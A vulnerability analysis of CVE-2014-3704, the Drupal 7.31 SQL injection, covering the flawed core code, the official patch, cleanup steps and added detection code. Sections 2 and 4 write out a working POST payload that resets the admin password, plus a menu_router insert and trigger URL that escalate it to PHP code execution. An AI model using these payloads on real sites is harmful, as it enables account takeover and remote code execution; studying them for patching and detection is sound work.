DRUPAL-PSA-CORE-2014-005 && CVE-2014-3704 Drupal 7.31 SQL Injection Vulnerability /includes/database/database.inc Analysis
Contents
. Vulnerability description
. Vulnerability trigger conditions
. Affected versions
. Vulnerable code analysis
. Defensive measures
. Thoughts on attack and defense
1. Vulnerability Description
Use Drupal to build everything from personal blogs to enterprise applications. Thousands of add-on modules and designs let you build any site you can imagine. Join us!
Drupal is an open-source content management framework (CMF) written in PHP; it consists of a content management system (CMS) and a PHP development framework.
Drupal was born in 2000. It is a development-oriented CMF written in PHP, i.e. CMS + Framework.
. Framework
It has two parts:
) the powerful PHP class and function libraries in the Drupal core
) the Drupal API abstracted on top of them
. CMS
HTML + JavaScript + CSS
Drupal's architecture has three major parts:
. core
. modules
. themes
The three are tightly bound together through the hook mechanism. The core is developed and maintained by a team of well-known web developers from around the world. Drupal's object-oriented, centralized implementation greatly improves the programming experience for developers, but it also introduces a risk: once a node on one of these low-level, core implementation paths has a flaw, such as a permission bug or a missing boundary check that allows SQL injection, the damage affects the whole system.
That is exactly the origin of this high-severity SQL injection in Drupal. The vulnerable code sits in Drupal's core, so although this is a web application, it can be thought of as a high-privilege code region; a SQL injection at this logical layer can lead to code execution with very high privileges.
A vulnerability in this API allows an attacker to send specially crafted requests resulting in arbitrary SQL execution. Depending on the content of the requests this can lead to privilege escalation, arbitrary PHP execution, or other attacks.
Relevant Link:
https://www.drupal.org/PSA-2014-003
https://www.drupal.org/SA-CORE-2014-005
http://www.oschina.net/news/56637/drupal-security-hole
https://security.berkeley.edu/content/critical-drupal-7x-sql-injection-vulnerability-cve-2014-3704
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-3704
http://www.freebuf.com/vuls/47271.html
2. Vulnerability Trigger Conditions
POST /drupal-7.31/?q=node&destination=node HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:28.0) Gecko/ Firefox/28.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/drupal-7.31/
Cookie: Drupal.toolbar.collapsed=0; Drupal.tableDrag.showWeight=0; has_js=1
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 231
name[0%20;update+users+set+name%3d'owned'+,+pass+%3d+'$S$DkIkdKLIvRK0iVHm99X7B/M8QC17E1Tp/kMOd1Ie8V/PgWjtAZld'+where+uid+%3d+'1';;#%20%20]=test3&name[0]=test&pass=shit2&test2=test&form_build_id=&form_id=user_login_block&op=Log+in
3. Affected Versions
0x1: Affected versions
Drupal 7.x - 7.31
4. Vulnerable Code Analysis
0x1: Analysis of the code that leads to SQL injection
Download the Drupal 7.31 source code for analysis. The root of the vulnerability is in "/includes/database/database.inc", which, architecturally, is Drupal's "core".
/**
 * Expands out shorthand placeholders.
 *
 * Drupal supports an alternate syntax for doing arrays of values. We
 * therefore need to expand them out into a full, executable query string.
 *
 * @param $query
 *   The query string to modify.
 * @param $args
 *   The arguments for the query.
 *
 * @return
 *   TRUE if the query was modified, FALSE otherwise.
 */
protected function expandArguments(&$query, &$args)
{
  $modified = FALSE;
  // If the placeholder value to insert is an array, assume that we need
  // to expand it out into a comma-delimited set of placeholders.
  /*
  array_filter() iterates over each value in the array, passing it to the
  callback function. If the callback returns TRUE, the current value is
  copied into the result array. Array keys are preserved.
  array_filter($args, 'is_array') therefore acts as a filter that pulls the
  "array" entries out of $args.
  */
  foreach (array_filter($args, 'is_array') as $key => $data)
  {
    $new_keys = array();
    /*
    This loop is the crux of the vulnerability:
    1. Neither the keys nor the values of the array are checked for
       "parameter purity", so an attacker can inject executable SQL through
       a key, which then taints the SQL statement about to be executed.
    2. In other words, the input is not forced into the range of values the
       program was designed to accept.
    */
    foreach ($data as $i => $value)
    {
      // This assumes that there are no other placeholders that use the same
      // name. For example, if the array placeholder is defined as :example
      // and there is already an :example_2 placeholder, this will generate
      // a duplicate key. We do not account for that as the calling code
      // is already broken if that happens.
      $new_keys[$key . '_' . $i] = $value;
    }
    // Update the query with the new placeholders.
    // preg_replace is necessary to ensure the replacement does not affect
    // placeholders that start with the same exact text. For example, if the
    // query contains the placeholders :foo and :foobar, and :foo has an
    // array of values, using str_replace would affect both placeholders,
    // but using the following preg_replace would only affect :foo because
    // it is followed by a non-word character.
    $query = preg_replace('#' . $key . '\b#', implode(', ', array_keys($new_keys)), $query);
    // Update the args array with the new placeholders.
    unset($args[$key]);
    $args += $new_keys;
    $modified = TRUE;
  }
  return $modified;
}
From expandArguments() we can see that the code applies no "parameter purity" preprocessing to the keys and values of the array, so an attacker can inject code through a key, and that key is later concatenated into the SQL statement. This is a DB PDO abstraction that Drupal provides so that programmers can conveniently build SQL queries from arrays, but the problem is that Drupal does not perform the necessary sanitization when handling this input array.
Let us trace back and find the code path that calls expandArguments().
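To make the mechanism concrete, here is an added Python model of expandArguments() in its 7.31 and 7.32 forms (written for this analysis; it is not Drupal's code), run over a constructed query and a constructed form array whose first key carries only a harmless SQL comment token instead of the payload shown above.

```python
import re

# Added example for this article, not Drupal's own code: a Python model of
# DatabaseConnection::expandArguments() as it behaves in Drupal 7.31
# (patched=False) and after the SA-CORE-2014-005 fix (patched=True).


def expand_arguments(query, args, patched):
    """Expand array placeholders and return (query, args).

    query:   SQL text with named placeholders such as ':name'.
    args:    dict mapping placeholder -> scalar, or -> dict/list of scalars
             (a dict models a PHP array whose keys came from the request).
    patched: when True the array is re-indexed first, as array_values()
             does in 7.32, so generated placeholder names use 0, 1, 2, ...
    """
    args = dict(args)
    for key, data in list(args.items()):
        if not isinstance(data, (list, dict)):
            continue
        if isinstance(data, list):
            data = dict(enumerate(data))
        if patched:
            data = dict(enumerate(data.values()))
        # 7.31 builds $key . '_' . $i from the caller-supplied key $i as is,
        # so whatever text the key contains ends up inside the SQL string.
        new_keys = {"%s_%s" % (key, i): value for i, value in data.items()}
        placeholders = ", ".join(new_keys)
        # preg_replace('#' . $key . '\b#', ...): only the exact placeholder,
        # not one that merely starts with the same text (:foo vs :foobar).
        query = re.sub(re.escape(key) + r"\b", lambda _m: placeholders, query)
        del args[key]
        args.update(new_keys)
    return query, args


# Constructed query using an array placeholder, the intended use of this API.
SAMPLE_QUERY = "SELECT uid FROM {users} WHERE name IN (:name)"

# Constructed form input: name[0 ; -- ]=alice&name[0]=bob becomes a PHP array
# whose first key is the string '0 ; -- ' rather than the integer 0.
CRAFTED_ARGS = {":name": {"0 ; -- ": "alice", "0": "bob"}}


def demo():
    """Return (query, args) pairs from the vulnerable and the patched code."""
    vuln_query, vuln_args = expand_arguments(SAMPLE_QUERY, CRAFTED_ARGS, patched=False)
    safe_query, safe_args = expand_arguments(SAMPLE_QUERY, CRAFTED_ARGS, patched=True)
    return vuln_query, vuln_args, safe_query, safe_args


if __name__ == "__main__":
    vq, va, sq, sa = demo()
    print("7.31:", vq, va)   # the key text lands inside the SQL
    print("7.32:", sq, sa)   # only :name_0, :name_1 reach the SQL
```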
/includes/database/database.inc
..
public function query($query, array $args = array(), $options = array())
{
  // Use default values if not already set.
  $options += $this->defaultOptions();
  try {
    // We allow either a pre-bound statement object or a literal string.
    // In either case, we want to end up with an executed statement object,
    // which we pass to PDOStatement::execute.
    if ($query instanceof DatabaseStatementInterface) {
      $stmt = $query;
      $stmt->execute(NULL, $options);
    }
    else {
      $this->expandArguments($query, $args);
      $stmt = $this->prepareQuery($query);
      // Here the tainted SQL statement is passed straight into the database
      // execution logic, which is what makes the SQL injection possible.
      $stmt->execute($args, $options);
    }
    ...
Having understood the principle at the code level, let us look at the actual attack payload.
name[%;update+users+set+name%3d'owned'+,+pass+%3d+'$S$DkIkdKLIvRK0iVHm99X7B/M8QC17E1Tp/kMOd1Ie8V/PgWjtAZld'+where+uid+%3d+'';;#%%]=test3
&name[]=test
&pass=shit2
&test2=test
&form_build_id=
&form_id=user_login_block
&op=Log+in
The attack payload changes the administrator's password to a preset one, which can be generated on your own machine.
/includes/password.inc
This file is Drupal's implementation of its password encryption/decryption algorithm; the author treats it as a symmetric encryption scheme and reuses its code to implement a password generator.
0x2: Analysis of the callback vulnerability derived from this SQL injection
We already know that Drupal's abstract PDO API has a SQL injection flaw. One direct consequence is that an attacker can use it for "multi-statement SQL execution" and thereby add arbitrary records to the database (in fact, execute arbitrary SQL statements).
In many cases a single flaw cannot, by itself, mount a real attack on a web system; often it is merely a "feature" of the language. PHP's callback execution mechanism is an example: it is a feature of PHP and, viewed on its own, cannot be called a vulnerability. But in the scenario of this CVE, when it is combined with the SQL injection, it escalates into an RCE (remote code execution) vulnerability.
mixed call_user_func_array ( callable $callback , array $param_arr )
//Calls the callback given by the first parameter with the parameters in param_arr.
http://cn2.php.net/manual/en/function.call-user-func-array.php
Applying the vulnerability-hunting idea of "tracing back from sensitive function call sites", we audit Drupal's code by searching for the files that call call_user_func_array().
This locates the menu_execute_active_handler() function in /include/menu.inc.
function menu_execute_active_handler($path = NULL, $deliver = TRUE)
{
  // Check if site is offline.
  $page_callback_result = _menu_site_is_offline() ? MENU_SITE_OFFLINE : MENU_SITE_ONLINE;
  // Allow other modules to change the site status but not the path because that
  // would not change the global variable. hook_url_inbound_alter() can be used
  // to change the path. Code later will not use the $read_only_path variable.
  $read_only_path = !empty($path) ? $path : $_GET['q'];
  drupal_alter('menu_site_status', $page_callback_result, $read_only_path);
  // Only continue if the site status is not set.
  if ($page_callback_result == MENU_SITE_ONLINE)
  {
    if ($router_item = menu_get_item($path))
    {
      if ($router_item['access'])
      {
        if ($router_item['include_file'])
        {
          require_once DRUPAL_ROOT . '/' . $router_item['include_file'];
        }
        /*
        This is the key code for exploitation: call_user_func_array() receives
        two parameters from $router_item; if both can be controlled, the result
        is RCE.
        */
        $page_callback_result = call_user_func_array($router_item['page_callback'], $router_item['page_arguments']);
      }
      else
      {
        $page_callback_result = MENU_ACCESS_DENIED;
      }
    }
    else
    {
      $page_callback_result = MENU_NOT_FOUND;
    }
  }
  // Deliver the result of the page callback to the browser, or if requested,
  // return it raw, so calling code can do more processing.
  if ($deliver)
  {
    $default_delivery_callback = (isset($router_item) && $router_item) ? $router_item['delivery_callback'] : NULL;
    drupal_deliver_page($page_callback_result, $default_delivery_callback);
  }
  else
  {
    return $page_callback_result;
  }
}
Note the line $page_callback_result = call_user_func_array($router_item['page_callback'], $router_item['page_arguments']); in the code.
call_user_func_array() receives two parameters from $router_item; if both can be controlled, the result is RCE. $router_item is assigned by $router_item = menu_get_item($path), so how can that be achieved?
Let us keep tracing into menu_get_item().
/**
 * Gets a router item.
 *
 * @param $path
 *   The path; for example, 'node/5'. The function will find the corresponding
 *   node/% item and return that.
 * @param $router_item
 *   Internal use only.
 *
 * @return
 *   The router item or, if an error occurs in _menu_translate(), FALSE. A
 *   router item is an associative array corresponding to one row in the
 *   menu_router table. The value corresponding to the key 'map' holds the
 *   loaded objects. The value corresponding to the key 'access' is TRUE if the
 *   current user can access this page. The values corresponding to the keys
 *   'title', 'page_arguments', 'access_arguments', and 'theme_arguments' will
 *   be filled in based on the database values and the objects loaded.
 */
function menu_get_item($path = NULL, $router_item = NULL)
{
  $router_items = &drupal_static(__FUNCTION__);
  /*
  This is the key point in the code: the $_GET['q'] we supply controls the
  final $router_item.
  */
  if (!isset($path))
  {
    $path = $_GET['q'];
  }
  if (isset($router_item))
  {
    $router_items[$path] = $router_item;
  }
  if (!isset($router_items[$path])) {
    // Rebuild if we know it's needed, or if the menu masks are missing which
    // occurs rarely, likely due to a race condition of multiple rebuilds.
    if (variable_get('menu_rebuild_needed', FALSE) || !variable_get('menu_masks', array())) {
      menu_rebuild();
    }
    $original_map = arg(NULL, $path);
    $parts = array_slice($original_map, 0, MENU_MAX_PARTS);
    $ancestors = menu_get_ancestors($parts);
    /*
    Look up the $_GET['q'] we supplied in menu_router and return every column
    of the best-fitting row.
    */
    $router_item = db_query_range('SELECT * FROM {menu_router} WHERE path IN (:ancestors) ORDER BY fit DESC', 0, 1, array(':ancestors' => $ancestors))->fetchAssoc();
    if ($router_item)
    {
      // Allow modules to alter the router item before it is translated and
      // checked for access.
      drupal_alter('menu_get_item', $router_item, $path, $original_map);
      $map = _menu_translate($router_item, $original_map);
      $router_item['original_map'] = $original_map;
      if ($map === FALSE) {
        $router_items[$path] = FALSE;
        return FALSE;
      }
      if ($router_item['access']) {
        $router_item['map'] = $map;
        $router_item['page_arguments'] = array_merge(menu_unserialize($router_item['page_arguments'], $map), array_slice($map, $router_item['number_parts']));
        $router_item['theme_arguments'] = array_merge(menu_unserialize($router_item['theme_arguments'], $map), array_slice($map, $router_item['number_parts']));
      }
    }
    $router_items[$path] = $router_item;
  }
  return $router_items[$path];
}
Several key points are visible in this function:
. Our input $_GET["q"] controls $path, and thereby the value that $router_item ends up holding
. The menu_router table is queried with our input $_GET['q'], and all columns of the matching row are returned
Going back up to the calling function menu_execute_active_handler():
if ($router_item['include_file'])
{
require_once DRUPAL_ROOT . '/' . $router_item['include_file'];
}
Here the file named by the $router_item["include_file"] value just fetched from the database is included, and right afterwards the page_callback from the router item is taken and passed into call_user_func_array() for execution.
Having analyzed this far, let us lay out the attack flow of this code vulnerability:
. The program uses the user-supplied $_GET['q'] as the condition to look up the matching record in the "menu_router" table and returns every column of the result
. Through Drupal's SQL injection vulnerability, any record we need can be inserted into the "menu_router" table
. When inserting into "menu_router", the "page_arguments" column must be null; then, by a characteristic of PHP, $router_item['page_arguments'] is equivalent to $router_item[], i.e. the first column of the returned record
. The final RCE execution point is in menu_execute_active_handler:
call_user_func_array($router_item['page_callback'], $router_item['page_arguments']);
that is,
call_user_func_array($router_item['page_callback'], $router_item[]);
. This PHP callback is what performs the code execution, so the following code scenario has to be constructed:
call_user_func_array("php_eval", $router_item[]);
. The php_eval() function is implemented in "modules/php/php.module", which therefore needs to be included
Putting the analysis together, we conclude that a record like the following has to be inserted into the "menu_router" table to satisfy the attack conditions:
insert into menu_router (path, page_callback, access_callback, include_file) values ('<?php phpinfo();?>','php_eval', '', 'modules/php/php.module');
As can be seen, path = $_GET['q']: $_GET['q'] is the code to be executed and, at the same time, the key used for the database lookup.
path is the code to execute;
include_file is the path of the PHP filter module;
page_callback is php_eval;
access_callback is set so that any user can access the item.
Visit: http://localhost/drupal-7.32/?q=%3C?php%20phpinfo();?%3E
Relevant Link:
https://www.drupal.org/project/drupal
http://php.net/manual/en/function.array-filter.php
http://cn2.php.net/manual/en/function.array-values.php
http://www.91ri.org/11074.html
http://www.freebuf.com/vuls/49148.html
http://www.beebeeto.com/pdb/poc-2014-0100/
5. Defensive Measures
0x1: Code fix
. Apply the official patch directly:
https://www.drupal.org/files/issues/SA-CORE-2014-005-D7.patch, or upgrade to Drupal 7.32
https://www.drupal.org/drupal-7.32-release-notes
diff --git a/includes/database/database.inc b/includes/database/database.inc
index f78098b..01b6385
--- a/includes/database/database.inc
+++ b/includes/database/database.inc
@@ -, +, @@ abstract class DatabaseConnection extends PDO {
// to expand it out into a comma-delimited set of placeholders.
foreach (array_filter($args, 'is_array') as $key => $data) {
$new_keys = array();
- foreach ($data as $i => $value) {
/*
array_values() returns all the values from the array and indexes the array numerically.
array_values($data)将数组的值单独剥离出来,组成一个数字索引的新数组
*/
+ foreach (array_values($data) as $i => $value) {
// This assumes that there are no other placeholders that use the same
// name. For example, if the array placeholder is defined as :example
// and there is already an :example_2 placeholder, this will generate
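Review bot: the `/* ... */` comment block between the `-` and `+` lines sits inside the hunk but is the article author's annotation, not part of SA-CORE-2014-005-D7.patch; it should be moved out of the diff so a reader cannot mistake it for patched lines (the `@@ -, +, @@` header has also lost its line numbers). The one-line change `+ foreach (array_values($data) as $i => $value) {` is sufficient on its own because `array_values()` makes `$i` a 0-based integer, so `$key . '_' . $i` can only yield `:name_0`, `:name_1`, ... and the caller-chosen key text no longer reaches the `preg_replace()` into `$query`, while the values still travel to the database as bound parameters in `$args`; that is why only the key needed fixing.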
After tidying:
/includes/database/database.inc
protected function expandArguments(&$query, &$args)
{
  $modified = FALSE;
  foreach (array_filter($args, 'is_array') as $key => $data)
  {
    $new_keys = array();
    //foreach ($data as $i => $value) {
    foreach (array_values($data) as $i => $value)
    {
      $new_keys[$key . '_' . $i] = $value;
    }
    $query = preg_replace('#' . $key . '\b#', implode(', ', array_keys($new_keys)), $query);
    unset($args[$key]);
    $args += $new_keys;
    $modified = TRUE;
  }
  return $modified;
}
The core idea of the fix is to strip the keys off the input array, forcing the input values back into the range of values the program was originally designed to accept.
0x2: Rolling back dirty data
For a vulnerability like this, fixing the code is not enough: dirty data must also be rolled back, because an attacker may have used the flaw to mount a SQL injection attack against the site and pollute the database; the dirty data therefore has to be repaired by rolling back to a backup.
. Take the website offline by replacing it with a static HTML page
. Notify the server's administrator, emphasizing that other sites or applications hosted on the same server might have been compromised via a backdoor installed by the initial attack
. Consider obtaining a new server, or otherwise remove all the website's files and database from the server. (Keep a copy safe for later analysis.)
. Restore the website (Drupal files, uploaded files and database) from backups from before October
. Update or patch the restored Drupal core code
. Put the restored and patched/updated website back online
. Manually redo any desired changes made to the website since the date of the restored backup
Audit anything merged from the compromised website, such as custom code, configuration, files or other artifacts, to confirm they are correct and have not been tampered with.
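Two checks a responder can run while auditing a restored site, added for this article (not Drupal's or the PSA's code): one flags form POST bodies whose bracketed array keys are not plain word characters, the other flags menu_router rows of the shape described in section 4. The request body and the rows (with only a subset of columns) are constructed samples.

```python
import re
from urllib.parse import parse_qsl

# Added example for this article, not Drupal's own code. All samples below
# are constructed.

# 1. Request bodies. Drupal's expanded placeholders are built from the
#    bracketed array keys of form fields, so a legitimate login POST only
#    carries keys made of word characters (name[0], field[1], ...).
ARRAY_KEY = re.compile(r"^(\w+)\[([^\]]*)\]")


def suspicious_form_keys(body):
    """Return the bracketed array keys in a urlencoded body that are not word-only."""
    hits = []
    for field, _value in parse_qsl(body, keep_blank_values=True):
        m = ARRAY_KEY.match(field)
        if m and not re.fullmatch(r"\w*", m.group(2)):
            hits.append(m.group(2))
    return hits


# 2. menu_router rows. The article shows a planted row whose path is PHP
#    source, whose page_callback is php_eval and whose include_file is
#    modules/php/php.module; php.module provides a text filter and registers
#    no menu items, so none of that appears in a clean install.
ROUTER_PATH = re.compile(r"^[\w%/.\-]+$")


def suspicious_router_rows(rows):
    """Return (path, reasons) for each menu_router row that looks planted."""
    findings = []
    for row in rows:
        reasons = []
        if not ROUTER_PATH.match(row["path"]):
            reasons.append("path contains characters no hook_menu() path uses")
        if row["page_callback"] == "php_eval":
            reasons.append("page_callback is php_eval")
        if row["include_file"].endswith("modules/php/php.module"):
            reasons.append("include_file points at the PHP filter module")
        if reasons:
            findings.append((row["path"], reasons))
    return findings


# Constructed body: name[0]=alice plus a second name[] entry whose key holds
# a harmless SQL comment token instead of a real payload.
SAMPLE_BODY = ("name%5B0%5D=alice&name%5B0+%3B+--+%5D=bob"
               "&pass=x&form_id=user_login_block&op=Log+in")

# Constructed rows: two ordinary Drupal 7 items and one planted row.
SAMPLE_ROWS = [
    {"path": "user", "page_callback": "user_page", "include_file": "modules/user/user.pages.inc"},
    {"path": "node/%", "page_callback": "node_page_view", "include_file": ""},
    {"path": "<?php phpinfo();?>", "page_callback": "php_eval", "include_file": "modules/php/php.module"},
]

if __name__ == "__main__":
    print("odd array keys:", suspicious_form_keys(SAMPLE_BODY))
    for path, reasons in suspicious_router_rows(SAMPLE_ROWS):
        print(repr(path), "->", "; ".join(reasons))
```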
Relevant Link:
http://help.aliyun.com/view/11108300_13852287.html
6. Thoughts on Attack and Defense
For an injection vulnerability of this kind and the callback RCE derived from it, the best defensive idea is "parameterized defense". Because of the nature of a dynamic language like PHP, a value that was expected to be an integer at runtime ends up carrying injected characters and is executed without complaint. Security auditors should apply "forced parameterization" to the relevant arrays and variables before sensitive function call sites are reached, i.e. force the input into an acceptable set of values and an acceptable variable type. This also fundamentally defends against a whole class of code vulnerabilities caused by how variables are initialized.
Copyright (c) 2014 LittleHann All rights reserved